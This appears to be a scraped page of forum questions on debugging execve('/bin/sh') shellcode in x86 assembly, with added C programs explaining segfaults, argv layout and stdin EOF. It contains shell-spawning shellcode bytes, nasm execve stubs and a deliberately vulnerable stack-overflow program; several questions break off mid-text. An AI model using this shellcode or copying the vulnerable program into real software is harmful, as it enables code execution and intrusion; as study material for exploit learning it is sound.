shellcode

Segfault when writing to string allocated by db [assembly]

。_饼干妹妹 submitted on 2021-02-15 05:28:51
Question: I'm following a basic shell-spawning exploit example. Below is exactly what my book tells me to write, yet I still get a segfault. When running this in gdb, I get a segfault at "mov byte [esi + 7], al". This line is necessary so that I can put a null byte at the end of my string "/bin/sh". When I flipped it around to "mov byte al, [esi + 7]", this did not cause a segfault. I'm assuming that I do not have write permissions to the place in memory where my string is stored. It seems I only have
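The guess in the post ("I do not have write permissions to the place in memory where my string is stored") can be turned into a check. A `db` placed in `section .text` is loaded into the same read+execute mapping as the code, so the store `mov byte [esi+7], al` faults while the load `mov byte al, [esi+7]` does not. The following C program is an added example, not code from the post or the book: it looks up the r/w/x bits of the mapping that holds an address by parsing `/proc/self/maps` (so it assumes Linux with `/proc` mounted), then compares a string in a read-only section with the same string in a writable one before attempting the NUL-terminating write the shellcode wants to make.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Copy the "rwxp" field of the /proc/self/maps entry that contains `addr`
 * into `out` (5 bytes).  Returns 1 when a mapping was found, 0 otherwise.
 * Linux only; assumes /proc is mounted. */
int mapping_perms(const void *addr, char out[5]) {
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return 0;
    uintptr_t a = (uintptr_t)addr;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char perms[5];
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) != 3) continue;
        if (a >= lo && a < hi) {
            memcpy(out, perms, 5);
            found = 1;
            break;
        }
    }
    fclose(f);
    return found;
}

int is_writable(const void *addr) {
    char p[5];
    return mapping_perms(addr, p) && p[1] == 'w';
}

int is_executable(const void *addr) {
    char p[5];
    return mapping_perms(addr, p) && p[2] == 'x';
}

/* The same eight bytes in two homes.  `in_rodata` is the C analogue of a db
 * that sits inside .text (or any read-only section); `in_data` is the
 * analogue of a db inside section .data. */
const char in_rodata[] = "/bin/shX";
char in_data[] = "/bin/shX";

/* What the shellcode's `mov byte [esi+7], al` tries to do: replace the
 * placeholder with NUL so execve sees a proper C string.  Checks the mapping
 * first and returns 1 only if the write was legal and produced "/bin/sh". */
int terminate_in_place(char *s) {
    if (!is_writable(s)) return 0;   /* the store would be SIGSEGV */
    s[7] = '\0';
    return strcmp(s, "/bin/sh") == 0;
}

int main(void) {
    char perms[5] = "????";
    mapping_perms(in_rodata, perms);
    printf("in_rodata lives in a %s mapping, writable=%d\n", perms, is_writable(in_rodata));
    mapping_perms(in_data, perms);
    printf("in_data   lives in a %s mapping, writable=%d\n", perms, is_writable(in_data));
    printf("code      executable=%d\n", is_executable((const void *)&mapping_perms));
    printf("patching in_data in place: %d\n", terminate_in_place(in_data));
    return 0;
}
```

The same lookup works from inside gdb by hand (`info proc mappings`, then compare the faulting address), and `readelf -S` shows which section the `db` ended up in. The usual shellcode fixes are to move the string into a writable place (push it onto the stack, or use the jmp/call/pop trick with the bytes in a writable section) rather than to patch a read-only one.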

shellcode buffer overflow - SegFault

时光毁灭记忆、已成空白 submitted on 2021-02-08 11:15:10
Question: I'm trying to run this shellcode but I keep getting a segmentation fault.

    /* call_shellcode.c */
    /*A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    const char code[] =
        "\x31\xc0"      /* Line 1: xorl %eax,%eax */
        "\x50"          /* Line 2: pushl %eax */
        "\x68""//sh"    /* Line 3: pushl $0x68732f2f */
        "\x68""/bin"    /* Line 4: pushl $0x6e69622f */
        "\x89\xe3"      /* Line 5: movl %esp,%ebx */
        "\x50"          /* Line 6: pushl %eax */
        "\x53"          /* Line 7:

Why doesn't syscall work?

若如初见. submitted on 2021-02-05 07:11:07
Question: I'm on MAC OSX and I'm trying to call the execve syscall through assembly. Its opcode is 59. In Linux I have to set the opcode into eax, then the parameters into the other registers, but here I have to put the opcode into eax and push the parameters onto the stack from right to left. So I need execve("/bin/sh",NULL,NULL); I found somewhere that with assembly null=0, so I put null into the 2nd and 3rd parameters.

    global start
    section .text
    start:
        jmp string
    main:
        ; 59 opcode
        ; int execve(char *fname, char

Pointer to string in stand-alone binary code without .data section

别来无恙 submitted on 2021-02-04 19:43:06
Question: I'm trying to write a kind of exploit and have a problem with making my asm code run anywhere on the stack. Here it is:

    BITS 64
    global _start
    _start:
        mov rax, 59
        jmp short file
    c1:
        pop rdi
        jmp short argv
    c2:
        pop rsi
        mov rdx, 0
        syscall
        ret
    file:
        call c1
        db '/bin/sh',0
    argv:
        call c2
        dq arg, 0      <- problem
    arg:
        db 'sh',0

This code won't work anywhere on the stack because of the selected line: since this code can be executed anywhere on the stack, nasm can't correctly compute arg's address. (This is a

Why Segment fault when writing to writeable .data section? Using Ubuntu, x86, nasm, gdb, readelf

给你一囗甜甜゛ submitted on 2021-01-28 09:01:13
Question: I'm learning to write a simple shell code using assembly. I get a segmentation fault when the mov opcode executes to write over the db data. Why? Any guidance appreciated! Debugging with gdb confirms the data is contiguous with the code at run time, and readelf analysis of the program confirms the data segment is writeable.

    section .text
    global _start
    _start:
        ; The following code calls execve("/bin/sh", argv, envp=0)
        jmp short two
    one:
        pop ebx
        xor eax, eax
        mov [ebx+12], eax
        mov [ebx+7], al
        mov [ebx

execve() argv in GAS AT&T assembler

故事扮演 submitted on 2021-01-27 14:40:43
Question: My code:

    .section .data
    name: .string "/bin/sh"
    args: .string "-c"
          .string "ls"
    .section .text
    .globl _start
    _start:
        pushq $0
        pushq name
        movq $59, %rax
        movq %rsp, %rdi
        pushq $0
        pushq args
        movq %rsp, %rsi
        movq $0, %rdx
        syscall

I know that the second argument of execve is an array of chars. How do I do this in assembly while avoiding this:

    execve("./payload", ["./payload"], 0x7ffc291fd160 /* 40 vars */) = 0
    execve("/bin/sh", [0x736c00632d], NULL) = -1 EFAULT (Bad address)
    --- SIGSEGV {si_signo=SIGSEGV, si
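The strace line shows the shape of the mistake: `pushq args` pushes the address of the bytes `"-c\0ls"`, and the kernel reads those bytes as the first `char *` of argv (little-endian `2d 63 00 6c 73 00 ..` is exactly `0x736c00632d`), then faults dereferencing it. `argv` must be an array of pointers, one per string, terminated by a NULL pointer, and each pointer must be a run-time address. That second point is also the problem in the "Pointer to string in stand-alone binary code without .data section" question above: `dq arg` asks the assembler for an absolute address it cannot know, so the pointer has to be computed when the code runs (from a popped return address or an rip-relative `lea`). The C program below is an added example, not the poster's assembly: it lays out the strings and the pointer array in one buffer with every pointer derived from the buffer's run-time address, executes `/bin/sh -c 'exit 7'` with it in a child process, and then repeats the exec with the broken argv from the post to show the EFAULT. It assumes Linux, a working `fork`, and `/bin/sh` at that path.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Lay out "/bin/sh\0-c\0<cmd>\0" followed by argv = {p0, p1, p2, NULL}
 * inside one caller-supplied buffer, every pointer computed from `buf` at
 * run time.  This is what jmp/call/pop or an rip-relative lea achieves in
 * shellcode: the absolute address is learned when the code runs, never baked
 * in by the assembler.  Returns the argv pointer, or NULL if `cap` is too small. */
char **build_argv_block(char *buf, size_t cap, const char *cmd) {
    const char *strs[3] = { "/bin/sh", "-c", cmd };
    size_t pos[3];
    size_t off = 0;
    for (int i = 0; i < 3; i++) {            /* strings first, contiguous */
        size_t n = strlen(strs[i]) + 1;
        if (off + n > cap) return NULL;
        memcpy(buf + off, strs[i], n);
        pos[i] = off;
        off += n;
    }
    off = (off + sizeof(char *) - 1) & ~(sizeof(char *) - 1);  /* align */
    if (off + 4 * sizeof(char *) > cap) return NULL;
    char **argv = (char **)(buf + off);      /* then the pointer array */
    for (int i = 0; i < 3; i++) argv[i] = buf + pos[i];
    argv[3] = NULL;
    return argv;
}

/* fork, execve("/bin/sh", argv, NULL) in the child, and report: the child's
 * exit status when the exec succeeds, otherwise 100 + errno from execve. */
int run_sh(char **argv) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/bin/sh", argv, NULL);
        _exit(100 + errno);                  /* only reached if execve failed */
    }
    int st = 0;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* The correct shape: argv is an array of run-time pointers. */
int run_correct(void) {
    char block[256];
    char **argv = build_argv_block(block, sizeof block, "exit 7");
    return argv ? run_sh(argv) : -1;
}

/* The mistake from the GAS post: the address of the string bytes themselves
 * is passed as argv.  The kernel reads "-c\0ls\0\0\0" as argv[0]
 * (0x736c00632d, as strace showed) and execve fails with EFAULT. */
int run_wrong(void) {
    static char bytes[16] = "-c\0ls";       /* zero-filled tail, like .string */
    return run_sh((char **)bytes);
}

int main(void) {
    printf("correct argv: sh exited with %d\n", run_correct());
    printf("wrong argv:   run_sh reported %d (100 + EFAULT = %d)\n",
           run_wrong(), 100 + EFAULT);
    return 0;
}
```

The memory picture `build_argv_block` produces is the one the assembly needs to reproduce: strings, then an array of their addresses, then a NULL; `rsi` points at the array, not at the strings. In the 64-bit shellcode above that means pushing the computed string addresses (and a zero) onto the stack and loading `rsi` from `rsp`, instead of `dq arg`.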

Exploit Development - GETS and Shellcode

给你一囗甜甜゛ submitted on 2020-12-05 11:49:06
Question: Trying to learn more about exploit dev and building shellcodes, but I ran into an issue I don't understand the reason behind. Why am I not able to run a shellcode such as execve("/bin/sh") and spawn a shell I can interact with, while on the other hand I'm able to create a reverse / bind_tcp shell and connect to it with netcat? Sample program:

    // gcc vuln.c -o vuln -m32 -fno-stack-protector -z execstack
    #include <stdio.h>
    #include <string.h>
    void test() {
        char pass[50];
        printf("Password: ");
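The usual reason for this symptom is not the shellcode but the new shell's stdin. When the payload is delivered with `python -c '...' | ./vuln` or `./vuln < payload`, the exploited process inherits a stdin that is already at end of file; `execve("/bin/sh")` succeeds, the shell reads EOF and exits immediately, and it looks as if nothing happened. A reverse or bind shell talks over its own socket and never touches that stdin, which is why it works. The program below is an added example, not the poster's `vuln.c`: it starts `/bin/sh` with stdin on a pipe and shows that closing the pipe makes the shell exit at once with status 0, while commands still in the pipe are run first. It assumes Linux, a working `fork`, and `/bin/sh` at that path.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Start /bin/sh with stdin on a pipe, write `input` into the pipe, close it,
 * and return the shell's exit status (-1 on error).  Closing the write end is
 * the EOF the shell sees when an exploit's input arrives through a pipe or a
 * redirect rather than a terminal. */
int sh_with_piped_stdin(const char *input) {
    int fds[2];
    if (pipe(fds) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        close(fds[1]);
        if (dup2(fds[0], STDIN_FILENO) < 0) _exit(126);
        close(fds[0]);
        char *argv[] = { "/bin/sh", NULL };
        execve("/bin/sh", argv, NULL);
        _exit(127);                      /* only reached if execve failed */
    }
    close(fds[0]);
    const char *p = input;
    size_t left = strlen(input);
    while (left > 0) {                   /* deliver the whole input */
        ssize_t n = write(fds[1], p, left);
        if (n <= 0) break;
        p += n;
        left -= (size_t)n;
    }
    close(fds[1]);                       /* EOF for the shell */
    int st = 0;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* What the poster sees: the payload is delivered, execve("/bin/sh") succeeds,
 * stdin is already at EOF, and the new shell exits at once with status 0. */
int shell_with_no_more_input(void) { return sh_with_piped_stdin(""); }

/* If the pipe still carries commands, the shell runs them before exiting. */
int shell_with_commands(void) { return sh_with_piped_stdin("exit 3\n"); }

int main(void) {
    printf("EOF on stdin:   sh exited with %d\n", shell_with_no_more_input());
    printf("with commands:  sh exited with %d\n", shell_with_commands());
    return 0;
}
```

The practical fix when testing by hand is to keep the pipe open after the payload, for example `(cat payload; cat) | ./vuln`, so the second `cat` forwards your keystrokes to the spawned shell; inside the payload itself, shellcode that reopens a terminal or the classic reverse shell sidesteps the problem entirely.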

Why does my data section appear twice in the compiled binary? Ubuntu, x86, nasm, gdb, readelf

▼魔方 西西 submitted on 2020-07-21 03:52:31
Question: A prior related question was answered. Thank you! However this creates a new question for me. Why does nasm put data bytes at two different memory locations? I include program information and other data dumps below.

    ---------- code snippet compiled with nasm, ld -----------------
    section .text
    ...
    zero:
        jmp short two
    one:
        pop ebx
        xor eax, eax
        mov [ebx+12], eax
        mov [ebx+8], ebx
        mov [ebx+7], al
        lea ecx, [ebx+8]
        lea edx, [ebx+12]
        mov al, 11
        int 0x80
    two:
        call one
    section .data align=1
    msg: db '